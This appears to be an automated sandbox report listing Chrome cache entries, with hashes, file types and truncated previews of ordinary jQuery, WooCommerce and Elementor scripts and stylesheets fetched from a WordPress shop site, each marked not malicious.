                                                                        Preview:/*!. * jQuery UI Effects Highlight 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","../version","../effect"],e):e(jQuery)}(function(t){"use strict";return t.effects.define("highlight","show",function(e,n){var o=t(this),i={backgroundColor:o.css("backgroundColor")};"hide"===e.mode&&(i.opacity=0),t.effects.saveStyle(o),o.css({backgroundImage:"none",backgroundColor:e.color||"#ffff99"}).animate(i,{queue:!1,duration:e.duration,easing:e.easing,complete:n})})});

                                                                        Chrome Cache Entry: 248

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (40083)
                                                                        Category:downloaded
                                                                        Size (bytes):107692
                                                                        Entropy (8bit):4.585836511394259
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:90093984937E78DABCFA6F3CEDBC740B
                                                                        SHA1:9AF4A26367DA41F81845FFF482476C3EB416F0A0
                                                                        SHA-256:9BDAABFCB7005BF961906C5ACD110D2118FA59A2A1979BF6D7921588A4998A8C
                                                                        SHA-512:80F322E66769AEE9CE393051FF863669203F93BE247319043D4851041CCEBEA46D02BC66E754DC0326F82CE4BCE7A41B84E30CB05370C1B2DD14925DA2B806F8
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/uploads/elementor/css/global.css?ver=1709081757
                                                                        Preview:.elementor-widget-heading .elementor-heading-title{color:var( --e-global-color-primary );font-family:var( --e-global-typography-primary-font-family ), Sans-serif;font-weight:var( --e-global-typography-primary-font-weight );}.elementor-widget-image .widget-image-caption{color:var( --e-global-color-text );font-family:var( --e-global-typography-text-font-family ), Sans-serif;font-weight:var( --e-global-typography-text-font-weight );}.elementor-widget-text-editor{color:var( --e-global-color-text );font-family:var( --e-global-typography-text-font-family ), Sans-serif;font-weight:var( --e-global-typography-text-font-weight );}.elementor-widget-text-editor.elementor-drop-cap-view-stacked .elementor-drop-cap{background-color:var( --e-global-color-primary );}.elementor-widget-text-editor.elementor-drop-cap-view-framed .elementor-drop-cap, .elementor-widget-text-editor.elementor-drop-cap-view-default .elementor-drop-cap{color:var( --e-global-color-primary );border-color:var( --e-global-color-pri

                                                                        Chrome Cache Entry: 249

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (3016)
                                                                        Category:dropped
                                                                        Size (bytes):3300
                                                                        Entropy (8bit):5.15422255971796
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:135916F0FF0720B4C5E5FD5B43ACD167
                                                                        SHA1:0963226836755C1D25EC786A52578A1B93519A6C
                                                                        SHA-256:108EABA9F7689F620824BE11EF49B4131611EAE4BEEE2E116FCEC0799117297B
                                                                        SHA-512:17F06D215AEE3F4D2781E7F0654B39BE1047FC2AA3718919146EEBBF58EF8FC4BC95B68747D4A3732110C756AAA367F5CC26258DA86CF537F21CEEB8C70881C8
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*!. * accounting.js v0.4.2. * Copyright 2014 Open Exchange Rates. *. * Freely distributable under the MIT license.. * Portions of accounting.js are inspired or borrowed from underscore.js. *. * Full details and documentation:. * http://openexchangerates.github.io/accounting.js/. */.!function(n){var f={version:"0.4.1",settings:{currency:{symbol:"$",format:"%s%v",decimal:".",thousand:",",precision:2,grouping:3},number:{precision:0,grouping:3,thousand:",",decimal:"."}}},i=Array.prototype.map,r=Array.isArray,e=Object.prototype.toString;function p(n){return""===n||n&&n.charCodeAt&&n.substr}function l(n){return r?r(n):"[object Array]"===e.call(n)}function m(n){return n&&"[object Object]"===e.call(n)}function d(n,r){for(var e in n=n||{},r=r||{})r.hasOwnProperty(e)&&null==n[e]&&(n[e]=r[e]);return n}function g(n,r,e){var t,o,a=[];if(!n)return a;if(i&&n.map===i)return n.map(r,e);for(t=0,o=n.length;t<o;t++)a[t]=r.call(e,n[t],t,n);return a}function h(n,r){return n=Math.round(Math.abs(n)),isNaN(n)

                                                                        Chrome Cache Entry: 252

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):44
                                                                        Entropy (8bit):4.324973733162441
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C8B819F59DB2E9F9900DB2B70BFBD006
                                                                        SHA1:6B2AC7B7CEBD19828B024E2ADAF26D7811A86D1A
                                                                        SHA-256:D486B54BDF5667982DA7439D12A3C2450204E4DA0F022ABC1A10D15A23A8192D
                                                                        SHA-512:E1FA7DA932CF248B402BD1D500D9DF63279DCAD1CA3B74BF2BD294CACC821DDA4CC0933B3FA0E9463BA8E2A9A386A9B44FF02015D7AAB55957A92E68A5A1C531
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAk4hyNYlKRO6RIFDRM0Cs4SFwlcpb32yDfoPRIFDeeNQA4SBQ3OQUx6?alt=proto
                                                                        Preview:CgkKBw0TNArOGgAKEgoHDeeNQA4aAAoHDc5BTHoaAA==

                                                                        Chrome Cache Entry: 255

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:troff or preprocessor input, ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):2598
                                                                        Entropy (8bit):4.897540123149002
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:6F36B1309FBBDE634A5D54DD1734274A
                                                                        SHA1:A94E730430930B2E048352996FF44BF28647669D
                                                                        SHA-256:7B6508C9E8E04DE8EBFEC5DE2CE1C4303BC46A0A279283EFF7E248C1C900A91B
                                                                        SHA-512:DB1CE7084979CB94F986E2768429B086F56D206545D63FDA354109C22FC1CE958F284CEC64F1A9C273F526B20C9A33E941A56271639856EF10BC0220F61C2FF7
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/themes/ciena/assets/vendors/perfect-scrollbar/perfect-scrollbar.css?ver=1.5.0
                                                                        Preview:/*. * Container style. */..ps {. overflow: hidden !important;. overflow-anchor: none;. -ms-overflow-style: none;. touch-action: auto;. -ms-touch-action: auto;.}../*. * Scrollbar rail styles. */..ps__rail-x {. display: none;. opacity: 0;. transition: background-color .2s linear, opacity .2s linear;. -webkit-transition: background-color .2s linear, opacity .2s linear;. height: 15px;. /* there must be 'bottom' or 'top' for ps__rail-x */. bottom: 0px;. /* please don't change 'position' */. position: absolute;.}...ps__rail-y {. display: none;. opacity: 0;. transition: background-color .2s linear, opacity .2s linear;. -webkit-transition: background-color .2s linear, opacity .2s linear;. width: 15px;. /* there must be 'right' or 'left' for ps__rail-y */. right: 0;. /* please don't change 'position' */. position: absolute;.}...ps--active-x > .ps__rail-x,..ps--active-y > .ps__rail-y {. display: block;. background-color: transparent;.}...ps:hover > .ps__rail-x,..ps:hover

                                                                        Chrome Cache Entry: 256

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):3265
                                                                        Entropy (8bit):4.796067829007445
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:B2DE6B41987CA830D4A394A21E0FE6DC
                                                                        SHA1:0F18FC00D00A92553F84F4F119760411DA2623F4
                                                                        SHA-256:8C80109A216052DBEB4C67FFDD0F0758B674186C62910CCC5E63F1F81E52828E
                                                                        SHA-512:9758C59B661D7C2D2B1D34EC493641564B0F965BD55A804534C00B5501689875E439CE93DBD646F3D7ADFA41AC1236E30A0A5C99FD9AF040566DD10F7968882B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:"use strict";.function woof_init_colors() {. //http://jsfiddle.net/jtbowden/xP2Ns/. jQuery('.woof_color_term').each(function () {.. var color = jQuery(this).data('color');. var img = jQuery(this).data('img');.. var bg = '';. if (img.length > 0) {. bg = 'background: url(' + img + ')';. } else {. bg = 'background:' + color + ' !important';. }.. var span = jQuery('<span style="' + bg + '" class="' + jQuery(this).attr('type') + ' ' + jQuery(this).attr('class') + '" title=""></span>').on('click', woof_color_do_check).mousedown(woof_color_do_down).mouseup(woof_color_do_up);. if (jQuery(this).is(':checked')) {. span.addClass('checked');. }. jQuery(this).wrap(span).hide();. jQuery(this).after('<span class="woof_color_checked"></span>');//for checking. });.. function woof_color_do_check() {. var is_checked = false;. var radio=false;. if(jQuery(this).pare

                                                                        Chrome Cache Entry: 257

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:GIF image data, version 89a, 24 x 24
                                                                        Category:downloaded
                                                                        Size (bytes):2545
                                                                        Entropy (8bit):7.144078312196678
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4B3AFB84B2B71EF56DF09997A350BD04
                                                                        SHA1:ACCDAC8A7ABEAB0E21C49539AAD0A973ADDB28EF
                                                                        SHA-256:9034D5D34015E4B05D2C1D1A8DC9F6EC9D59BD96D305EB9E24E24E65C591A645
                                                                        SHA-512:D65078B5D13873ADB363472B5C358F6B42C128B530F8FEBA9776F8E4906CC97F20EE7BF1E823336CDA8049147A9C7FA5E4016F07F96EC154F3774FBDE1A564B6
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/revslider/public/assets/assets/loader.gif
                                                                        Preview:GIF89a...........................................vvv......hhh..........................................!..Created with ajaxload.info.!.......!..NETSCAPE2.0.....,........... .$.AeZ...<...Q46.<...A.......H.a....:....ID0.F...a\xG.3...!...O:-....Rj...TJ..*........t...........~."...ds]......)t...-"...i;H>.n.Qg]_*......R.3.....GI?.....v$...j3!.!.......,........... .$.0eZ..y..0..q ..P..W...)";..qX.^..D50......<H3.!.....k-.n..a. .(.i...d.$P@y.w`.J..#.....?..y........o...g.....f....'8..{..'C.p`j.n."...2.{.`x...jy.4...C,.4..o#n.$.....!.!.......,........... .$. eZ...$.2.....q....E. ....p$H@D/.....G.D.j8v#..P((D..... ..N.(3..#.y....(@...gUx*.kK.).....?K...............$..."....*.......K.....W......x..?.G...#.W....n.h.K,.....+.....*!.!.......,........... .$ .eZ..Y.$1..Q(c......O'"............. 1....q.d"..A.....V.x8p..4988.MRC.@....e*.3@.iI.)..'.?I.........@.......,.....#.........5..,.....".E..z...?..@.E...@.....).....*!.!.......,........... .$.(e..$....C.E1..;...('2$..

                                                                        Chrome Cache Entry: 260

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):3382
                                                                        Entropy (8bit):4.825319082963539
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D9E5D57FD0EBF37D1F24860DB345293C
                                                                        SHA1:BCEC14EE17A157FE543D5772BA03610F02BD0D2A
                                                                        SHA-256:93D9177503F6230BA587E755E030E87FB40ACDA1A57268ED46C3886FFAFC6C53
                                                                        SHA-512:4729416B814E159A3D15124C17B1A4DC74CAA854092DDE30AA917B2E16FB35CF802B570C6B4F8FDA8EF4CE07C27CB9C5105087B3CA856888C1751AE358FC3A0C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/themes/ciena/inc/elementor/widgets/assets/css/category_bg.css?ver=1.0.8
                                                                        Preview:.ciena-category-background {. position: relative;. height: 100vh;. overflow: hidden;.}..ciena-category-background .category_content_wrap {. position: relative;. z-index: 2;. display: table;. height: 100%;. table-layout: fixed;. width: 100%;. text-align: center;. padding-top: 100px;.}..ciena-category-background .category_content_wrap .categories-item {. display: table-cell;. vertical-align: bottom;. border-top: 1px solid rgba(255, 255, 255, 0.2);. border-right: 1px solid rgba(255, 255, 255, 0.2);. text-align: right;.}..ciena-category-background .category_content_wrap .categories-item:last-child {. border-right: none;.}..ciena-category-background .category_content_wrap .categories-item .cat-name {. text-align: center;.}..ciena-category-background .category_content_wrap .categories-item .cat-name .cat-link {. color: #fff;. transform: translateY(-100px);. display: flex;. flex-direction: column;. align-items: center;. height: 70px;. justify-content: space-between;.

                                                                        Chrome Cache Entry: 263

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):145
                                                                        Entropy (8bit):4.858959706976188
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:5156C949306BA5F0A676C709117C8AD1
                                                                        SHA1:0DA6688897598D5D2D84265EDCC428B1CDC19D06
                                                                        SHA-256:526493CFCA4D1B80A4678FB7C720F4059955CA78D5C8EDF67816E3CA2C2AF590
                                                                        SHA-512:14D8342B3A5139684BC7CD0ABF0BA550F4AA714D52430BF03ABFE813CCA1C62373AE030928E0815363F2C16ADC8098BEB7FC0DAB03729EB3819CCE981A2B6258
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/fami-templatekits/assets/css/fmtpl-menu.css?ver=1.0.4
                                                                        Preview:.fmtpl-menu .nav_menu_content.has_item_divider .menu-item:after {. content: "";. display: block;.}../*# sourceMappingURL=fmtpl-menu.css.map */.

                                                                        Chrome Cache Entry: 265

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):5879
                                                                        Entropy (8bit):4.852849803250077
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:640413C6D8159FEE87A693B9CB96C37B
                                                                        SHA1:EE0B88E0FFF31B32CD6D8B7FB90BACF18672DB93
                                                                        SHA-256:E96BFA99D8571EDE293575643BF30AB3D74A9C689AD6651CF39FBC2A0BA7B663
                                                                        SHA-512:92DC0C81818A0FB0D6C8198934DC32CB38D62612800800B1228C26D4D1F93A6EDB461199E04D27AF66079F3322A73A9EC1E2623328E44DB8C5A79FEF1ADFA02D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/fami-templatekits/assets/css/fmtpl-addons.css?ver=1.0.4
                                                                        Preview:.fmtpl-elementor-widget svg {. width: 1em;. height: 1em;.}..fmtpl-elementor-widget .fmtpl-widget-title .highlight {. font-weight: 900;. color: #000;.}...fmtpl-elementor-main-swiper .elementor-swiper-button {. display: flex;. align-items: center;. justify-content: center;.}..fmtpl-elementor-main-swiper .elementor-swiper-button.elementor-swiper-button-prev > span {. margin-left: 10px;.}..fmtpl-elementor-main-swiper .elementor-swiper-button.elementor-swiper-button-next > span {. margin-right: 10px;.}..fmtpl-elementor-main-swiper .fmtpl-post-readmore {. display: inline-block;.}..fmtpl-elementor-main-swiper .swiper-pagination.disabled {. display: none !important;.}..fmtpl-elementor-main-swiper .swiper-pagination.swiper-pagination-bullets .swiper-pagination-bullet {. border-radius: initial;.}..a.fmtpl-button-default {. display: inline-flex;. align-items: center;. justify-content: center;.}.a.fmtpl-button-default.left .fmtpl-btn-icon {. margin-right: 6px;.}.a.fmtpl-button-defa

                                                                        Chrome Cache Entry: 266

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (10019)
                                                                        Category:downloaded
                                                                        Size (bytes):18468
                                                                        Entropy (8bit):4.942984129844562
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4601BA55044413706C2022CB6C1C3D05
                                                                        SHA1:5103EC2FBB389568EBF5CFE4FD721F3DF2FF7AEC
                                                                        SHA-256:FE513EF974B767510D0A2B9F1B4D3AFA53185B89AB617C869E5E3D6DB960192C
                                                                        SHA-512:8DAB2D19378E34B40043621AAC57B418E56486DCFEBD1A5991BE8A02EE6B071D07EC6BFD9408DEA8FF0198995DE9D42A46E66513D68B40B68056707E4E691E01
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.6.1
                                                                        Preview:@keyframes bounce{20%,53%,80%,from,to{animation-timing-function:cubic-bezier(.215,.61,.355,1);transform:translate3d(0,0,0)}40%,43%{animation-timing-function:cubic-bezier(.755,.050,.855,.060);transform:translate3d(0,-30px,0)}70%{animation-timing-function:cubic-bezier(.755,.050,.855,.060);transform:translate3d(0,-15px,0)}90%{transform:translate3d(0,-4px,0)}}.bounce{animation-name:bounce;transform-origin:center bottom}@keyframes flash{50%,from,to{opacity:1}25%,75%{opacity:0}}.flash{animation-name:flash}@keyframes pulse{from,to{transform:scale3d(1,1,1)}50%{transform:scale3d(1.05,1.05,1.05)}}.pulse{animation-name:pulse}@keyframes rubberBand{from,to{transform:scale3d(1,1,1)}30%{transform:scale3d(1.25,.75,1)}40%{transform:scale3d(.75,1.25,1)}50%{transform:scale3d(1.15,.85,1)}65%{transform:scale3d(.95,1.05,1)}75%{transform:scale3d(1.05,.95,1)}}.rubberBand{animation-name:rubberBand}@keyframes shake{from,to{transform:translate3d(0,0,0)}10%,30%,50%,70%,90%{transform:translate3d(-10px,0,0)}20%,40%

                                                                        Chrome Cache Entry: 268

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1241)
                                                                        Category:downloaded
                                                                        Size (bytes):1392
                                                                        Entropy (8bit):5.270206775867599
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4F8F624A1F37DED882A2E982A07ECE34
                                                                        SHA1:B1ADADACB1A2120B1579E731115F003C91167823
                                                                        SHA-256:6407A9FFC16173F1D3330525F44A332501D2ED672CF276371A6C5CE2C4B9EA1E
                                                                        SHA-512:329D62BC0F1B1A12B72EA3C7F3A94A45B706DBAE8887AFBBFA0D45A2AFA176BC06DF0D823C0850BC52C4CC254D61ADC82EF9F6517B8504752136FC49A76900DF
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js?ver=1.4.1-wc.6.6.1
                                                                        Preview:/*!. * jQuery Cookie Plugin v1.4.1. * https://github.com/carhartl/jquery-cookie. *. * Copyright 2013 Klaus Hartl. * Released under the MIT license. */.!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?e(require("jquery")):e(jQuery)}(function(a){var o=/\+/g;function s(e){return x.raw?e:encodeURIComponent(e)}function m(e,n){e=x.raw?e:function(e){0===e.indexOf('"')&&(e=e.slice(1,-1).replace(/\\"/g,'"').replace(/\\\\/g,"\\"));try{return e=decodeURIComponent(e.replace(o," ")),x.json?JSON.parse(e):e}catch(n){}}(e);return"function"==typeof n?n(e):e}var x=a.cookie=function(e,n,o){var i,t;if(n!==undefined&&"function"!=typeof n)return"number"==typeof(o=a.extend({},x.defaults,o)).expires&&(t=o.expires,(i=o.expires=new Date).setTime(+i+864e5*t)),document.cookie=[s(e),"=",(t=n,s(x.json?JSON.stringify(t):String(t))),o.expires?"; expires="+o.expires.toUTCString():"",o.path?"; path="+o.path:"",o.domain?"; domain="+o.domain:"",o.secure?"; secure":""].join(

                                                                        Chrome Cache Entry: 269

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):3053
                                                                        Entropy (8bit):3.887265636358029
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:0624A076A8B15D2D238FB31043BED59C
                                                                        SHA1:A1F9ADBCB37555B3ADB1F59666CE22DB51658382
                                                                        SHA-256:CB8528F82C58653AB48A3C62C296C0E5B8483AB9D53A435D1372D401FD2A63D0
                                                                        SHA-512:CB7FA810802EBD7BF47EAA3CFC464F9793AAFE3767C662D2C211C9A12ED99F078090919D88F2BC0B17F56B237390D176A2621D408FBA2893C246AF2BECA12EB2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.5.4
                                                                        Preview:(function ($) {. $.extend({. AdvanceWooDiscountRules: {. form: null,. product_id: null,. quantity: 0,. options: [],. target: null,. getDynamicDiscountPriceFromCartForm: function($form, $target, $options){. if (typeof $options !== 'undefined') {. this.options = $options;. }. if (typeof $target !== 'undefined') {. this.target = $target;. }. if (typeof $form !== 'undefined' && $form.is('form')) {. this.form = $form;. } else {. this.logError("Incorrect form provided");. }. this.product_id = this.getProductIdFromForm();.. this.quantity = this.getProductQuantityFromForm();. this.getDiscountPriceForProduct();. },. getDiscountPriceForProduct: function () {. if(

                                                                        Chrome Cache Entry: 271

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 30096, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):30096
                                                                        Entropy (8bit):7.993476328160492
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:5E3A4044EE4A46B65E2289F76EA1ECDA
                                                                        SHA1:1CD261CC685E2D003CBBBF6AF1FFDE0959934DCE
                                                                        SHA-256:7F0F781820C8DE56BD6699AC9570FF90634DE4EB5CCA7EF4B573BB90619E5A5D
                                                                        SHA-512:EEA79095306DB7796604FA130DF57432BBB565BC430CA832AE5DFE29D0E875830771D442C39D7983CB78022C99973B2A4213DE328862BE18164B6D42BF6C68F0
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://fonts.gstatic.com/s/mulish/v13/1Ptvg83HX_SGhgqk3wot.woff2
                                                                        Preview:wOF2......u........0..u..............................`...?HVAR.B.`?STAT.8'2..2/~....X.,..J.0..t.6.$..l. ..H..........t._......}...nl.;....*...`.. D.T...HNd.f.........,........V.f.y.9.....%..N...W&.".t....!= ...l.(SfBeXb."C.a..&K.G..........f.O.B...~#A./3..YA>..-\.v"9.3...E..w8.g...m..XG..Pl...#..`^[..G.^..p........._...k..U}..A}$....>.........H...'.#.......C.A.b|..Rs..+o<5...i..Q. ..<../..mS.J-...../BBH..D.1oig7.31:z..n:1ig...........H..._..`.......X.k..1..0.3.......2.........~{..A.b....{..."R)..%C,.D&.!...w.})@..E.w.)..;.b..ID3.'.~.y.....2.1..`.6..RJ.k...>d.....%[.Z.9.Y..|..=Q.-bw.~../..~ X..c.e..h..........'Y..%M.......?...F...u.y..g%._U^.U ..`.&J....Z.......Qr....6...-....a.2~.O*.J...D*.......v.....B.^I..)S....nJ..Z..._.@.2...:....dxo.J...A......V.n}.1..p....i~....!hE.r.:..A.i.5.M6U.T.;#...........E....o.+fc..B...Q..}(....~...9...6.s!..=.t..D...Nh..q.Iw..WX.+........<{.W.._9.qIo..`...4..~._.g.f..b...N'$J._...q..*...M....o.*...y5..........Hs.$..

                                                                        Chrome Cache Entry: 272

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):1408
                                                                        Entropy (8bit):4.687391425904603
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:477AE0FE6FFF5413FCC27ABBC7F7A566
                                                                        SHA1:DE42E0AB48A87D6987409D4E6657A4E0E5B9B1E2
                                                                        SHA-256:3A4F210A8F780982DE629B46B3BCD1480B8F2217B74CFB7C5E3279A79AECD7A8
                                                                        SHA-512:04AECF611AA83C96250E7A1E2A469A7C3FF7477136EC98378CD7C5408EEA29F076A50B4A46E3501BA1F195F3D74515C1EBBAD2682CCDE66964EF744E92BA1250
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/color/css/html_types/color.css?ver=3.3.0
                                                                        Preview:.woof_sid_auto_shortcode .woof_container_color{..}...woof_sid_auto_shortcode .woof_container_inner_color{. padding: 9px;. background: #fff;. border-radius: 7px;. border-radius: 7px;.}..ul.woof_list_color li{. display: inline-block !important;.}..ul.woof_list_color li {. display: inline-block;. float: none !important;. margin: 3px 3px 0 0 !important;. padding: 0 !important;.}.ul.woof_list_color.woof_color_title_col li {. display: block;.}..woof_color_title_col li .woof_color_term {. display: inline-block;.}.ul.woof_list_color.woof_color_title_col li .woof_color_title{. display: inline-block;. height: 30px;. padding: 5px;. vertical-align: top;. font-size: 14px;.}..woof_color_title_col p:hover.woof_tooltip span.woof_tooltip_data {. bottom: 40px;.}...woof_color_term {. display: block;. width: 50px;. height: 50px;. border: 2px solid #eee;. padding: 2px;. background-clip: content-box;. color: #292f38;. font-size: 0;.

                                                                        Chrome Cache Entry: 273

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (372)
                                                                        Category:downloaded
                                                                        Size (bytes):9765
                                                                        Entropy (8bit):4.814774684621602
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:72E9B866AC4B28674A41F8535A512CCA
                                                                        SHA1:33CF8115AA16B4F6AA2C28494DBD5126839E80C0
                                                                        SHA-256:EA2B40344A11F515E346ED0622BFF12600F3CF80C35D02C538C9CE72E1E5F9EB
                                                                        SHA-512:EA5C3FD755F6A0E8B8F293847ADECFDE25876E97D76209235C097110309DB7F53253AD090D5EC5134EC96498CD60559F6D4CA497CE54191399B346FFC8F217CF
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=3.3.0
                                                                        Preview:/*!.Chosen, a Select Box Enhancer for jQuery and Prototype.by Patrick Filler for Harvest, http://getharvest.com..Version custom.Full source at https://github.com/harvesthq/chosen.Copyright (c) Harvest http://getharvest.com..MIT License, https://github.com/harvesthq/chosen/blob/master/LICENSE.md.This file is generated by `grunt build`, do not edit it by hand..*/.chosen-container{. position:relative;. display:inline-block;. vertical-align:middle;. font-size:13px;. user-select:none.}..chosen-container *{. box-sizing:border-box.}..chosen-container .chosen-drop{. position:absolute;. top:100%;. z-index:1010;. width:100%;. border:1px solid #aaa;. border-top:0;. background:#fff;. clip:rect(0,0,0,0);. clip-path:inset(100% 100%).}..chosen-container.chosen-with-drop .chosen-drop{. clip:auto;. clip-path:none.}..chosen-container a{. cursor:pointer.}..chosen-container .chosen-single .group-name,.chosen-container .search-choice .group-name{. ma

                                                                        Chrome Cache Entry: 275

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (3248)
                                                                        Category:downloaded
                                                                        Size (bytes):3428
                                                                        Entropy (8bit):5.036898941425704
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:DD6A0D8D7B3E0AFBBC0BBB417DCC387B
                                                                        SHA1:0B38C782DA1C8ECC6BC7E854F8841FB9D2C86E35
                                                                        SHA-256:F36ADC07DB49E73C3FD3AEB4234D270725F07719706DD28DFC09657F2CFFE9D6
                                                                        SHA-512:E0963A8C2DE54CA9A29D2F3FB0ADF54946172E11589F0DA3DAFBF603B9F38C7A4A8A977465B0A9C32DA9D4127D916E60C390DEA1E17D55B3EDEE0B760401135C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.13.3
                                                                        Preview:/*!. * jQuery UI Mouse 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","../ie","../version","../widget"],e):e(jQuery)}(function(o){"use strict";var n=!1;return o(document).on("mouseup",function(){n=!1}),o.widget("ui.mouse",{version:"1.13.3",options:{cancel:"input, textarea, button, select, option",distance:1,delay:0},_mouseInit:function(){var t=this;this.element.on("mousedown."+this.widgetName,function(e){return t._mouseDown(e)}).on("click."+this.widgetName,function(e){if(!0===o.data(e.target,t.widgetName+".preventClickEvent"))return o.removeData(e.target,t.widgetName+".preventClickEvent"),e.stopImmediatePropagation(),!1}),this.started=!1},_mouseDestroy:function(){this.element.off("."+this.widgetName),this._mouseMoveDelegate&&this.document.off("mousemove."+this.widgetName,this._mouseMoveDelegate).of

                                                                        Chrome Cache Entry: 279

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2914
                                                                        Entropy (8bit):5.454731226636154
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:FD6449587DFAF05DAA350E2834EFE720
                                                                        SHA1:05F47DD3212FC8DAB7A4A9BD99F712B3CFF8CA49
                                                                        SHA-256:2392F9C1DAEA3B76288DD76C196D119E65B0ADB41D6EEE0AA5859AA0D2DE21B3
                                                                        SHA-512:81B5A12C2CE15A2A8383AF43921CB02FE089BE86968661CF3DCF92A86F51D497AA373F47808ACDB33BE4D7324B37BE2B332A77B305AD495CD8A96147BD07D949
                                                                        Malicious:false
                                                                        Reputation:unknown
